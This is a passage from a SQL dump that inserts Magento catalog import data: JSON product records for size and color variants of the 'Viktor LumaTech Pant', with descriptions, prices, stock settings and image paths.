Pant-33-Gray\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-33-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Gray\"},\"696\":{\"sku\":\"MP02-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-33-Red\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"697\":{\"sku\":\"MP02-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-34-Blue\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"698\":{\"sku\":\"MP02-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-34-Gray\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"699\":{\"sku\":\"MP02-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-34-Red\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(8, 'catalog_product', 'append', '{\"700\":{\"sku\":\"MP02-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-36-Blue\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-36-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Blue\"},\"701\":{\"sku\":\"MP02-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-36-Gray\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/p\\/mp02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"702\":{\"sku\":\"MP02-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant-36-Red\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"viktor-lumatech-trade-pant-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/p\\/mp02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"703\":{\"sku\":\"MP02\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Pants,Default Category\\/Promotions\\/Pants,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Viktor LumaTech&trade; Pant\",\"description\":\"<p>You\'ll love the new Viktor LumaTech&trade; Pant, with featherweight fleece fabric lining and stretchy, sweat-wicking material. It delivers toasty warmth on the sidelines or in cold-weather training, with reflective trim for a safe finish.<\\/p>\\n<p>&bull; Dark gray polyester\\/spandex straight leg pants.<br \\/>&bull; Elastic waistband and internal drawstring.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"46\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/p\\/mp02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Track 